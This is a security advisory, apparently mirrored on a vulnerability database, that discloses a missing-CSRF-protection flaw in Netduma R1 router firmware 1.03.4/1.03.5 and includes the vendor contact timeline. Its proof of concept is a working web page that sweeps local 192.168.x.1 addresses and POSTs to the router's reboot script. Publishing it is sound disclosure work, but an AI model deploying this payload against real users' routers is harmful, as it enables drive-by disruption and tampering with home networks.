`## Introduction
Affected Product: Netduma R1 Router
Affected Version(s): 1.03.4 and 1.03.5
Link: http://www.netduma.com/firmware/R1-v-1-03-4.sig
Vendor Website: https://netduma.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/19/2015
Disclosed to public: 12/29/2015
Credits: @joshchaney
## Vulnerability Summary
There is no CSRF protection for any administrative actions, which would allow an attacker to modify router settings or reboot the router by getting the victim to visit an attacker controlled website.
## Proof of Concept
Reboot router:
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
</head>
<body>
<script>
var i = 1;
while (i < 255) {
$.post("http://192.168." + i + ".1/cgi-bin/reboot.sh");
i++;
}
</script>
</body>
</html>
## Report Timeline
11/19/2015 Informed vendor about issue through email
11/29/2015 Tweeted to vendor about issue
11/30/2015 Vendor tweeted that they would respond to email about issue
12/07/2015 Emailed known customer about issue who forwarded email to CEO
12/08/2015 CEO responded to email explaining he had passed the information to the lead developer
12/29/2015 Disclosed to public for lack of acknowledgement of issue
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation